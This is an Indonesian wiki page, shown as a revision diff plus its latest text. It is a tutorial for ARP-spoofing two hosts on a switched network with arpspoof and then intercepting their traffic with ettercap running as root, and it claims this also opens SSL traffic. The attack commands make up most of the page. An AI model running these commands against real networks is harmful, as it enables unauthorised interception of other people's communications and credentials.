Difference between revisions of "MITM: aprspoof switch"
Jump to navigation
Jump to search
Onnowpurbo (talk | contribs) |
Onnowpurbo (talk | contribs) |
||
(5 intermediate revisions by the same user not shown) | |||
Line 8: | Line 8: | ||
echo 1 > /proc/sys/net/ipv4/ip_forward | echo 1 > /proc/sys/net/ipv4/ip_forward | ||
+ | sysctl net.ipv4.ip_forward=1 | ||
sysctl -w net.inet.ip.forwarding=1 | sysctl -w net.inet.ip.forwarding=1 | ||
==Asumsi Jaringa== | ==Asumsi Jaringa== | ||
− | 192.168.0. | + | 192.168.0.106 --- SWITCH ---- 192.168.0.100 |
| | | | ||
| | | | ||
192.168.0.3 | 192.168.0.3 | ||
− | komunikasi antara 192.168.0. | + | komunikasi antara 192.168.0.100 dan 192.168.0.106 melalui swicth akibatnya 192.168.03 tidak bisa melihat packet yang lewat. |
Attacker 192.168.0.3 harus melakukan spoofing. | Attacker 192.168.0.3 harus melakukan spoofing. | ||
Line 33: | Line 34: | ||
killall arpspoof | killall arpspoof | ||
+ | |||
+ | ==Siapkan ettercap== | ||
+ | |||
+ | Edit | ||
+ | |||
+ | vi /etc/ettercap/etter.conf | ||
+ | |||
+ | Ubah | ||
+ | |||
+ | [privs] | ||
+ | ec_uid = 65534 # nobody is the default | ||
+ | ec_gid = 65534 # nobody is the default | ||
+ | |||
+ | jadi | ||
+ | |||
+ | [privs] | ||
+ | # ec_uid = 65534 # nobody is the default | ||
+ | # ec_gid = 65534 # nobody is the default | ||
+ | ec_uid = 0 | ||
+ | ec_gid = 0 | ||
+ | |||
+ | Perhatikan juga | ||
+ | |||
+ | # if you use iptables: | ||
+ | #redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport" | ||
+ | #redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport" | ||
+ | |||
+ | |||
+ | |||
==Sadap dengan Ettercap== | ==Sadap dengan Ettercap== | ||
Line 38: | Line 68: | ||
sadap komunikasi antara 2 mesin, | sadap komunikasi antara 2 mesin, | ||
− | ettercap - | + | ettercap -G |
− | |||
− | |||
− | |||
− | |||
− | |||
yang menarik dari ettercap dia juga akan membuka komunikasi SSL yang terenkripsi. | yang menarik dari ettercap dia juga akan membuka komunikasi SSL yang terenkripsi. | ||
Line 50: | Line 75: | ||
ettercap -J | ettercap -J | ||
− | |||
==Referensi== | ==Referensi== | ||
* https://www.irongeek.com/i.php?page=security/arpspoof | * https://www.irongeek.com/i.php?page=security/arpspoof | ||
+ | * https://informationtreasure.wordpress.com/2014/07/31/man-in-the-middle-attack-with-kali-linux-ettercap-mitm/ |
Latest revision as of 16:27, 4 April 2017
sumber: https://www.irongeek.com/i.php?page=security/arpspoof
Untuk melakukan arpspoofing pada switch.
Set IP forwarding
Set IP fowarding
echo 1 > /proc/sys/net/ipv4/ip_forward sysctl net.ipv4.ip_forward=1 sysctl -w net.inet.ip.forwarding=1
Asumsi Jaringa
192.168.0.106 --- SWITCH ---- 192.168.0.100 | | 192.168.0.3
komunikasi antara 192.168.0.100 dan 192.168.0.106 melalui swicth akibatnya 192.168.03 tidak bisa melihat packet yang lewat. Attacker 192.168.0.3 harus melakukan spoofing.
Aktifkan arpspoofing
attacker melakukan spoofing
arpspoof -t 192.168.0.100 192.168.0.106 & >/dev/null arpspoof -t 192.168.0.106 192.168.0.100 & >/dev/null
Bagian "& >/dev/nul" di ketik agar mudah menjalankan di satu terminal.
Untuk men-stop arpspoofing,
killall arpspoof
Siapkan ettercap
Edit
vi /etc/ettercap/etter.conf
Ubah
[privs] ec_uid = 65534 # nobody is the default ec_gid = 65534 # nobody is the default
jadi
[privs] # ec_uid = 65534 # nobody is the default # ec_gid = 65534 # nobody is the default ec_uid = 0 ec_gid = 0
Perhatikan juga
# if you use iptables: #redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport" #redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
Sadap dengan Ettercap
sadap komunikasi antara 2 mesin,
ettercap -G
yang menarik dari ettercap dia juga akan membuka komunikasi SSL yang terenkripsi.
Untuk menggunakan ettercap untuk sniffing, dapat menggunakan
ettercap -J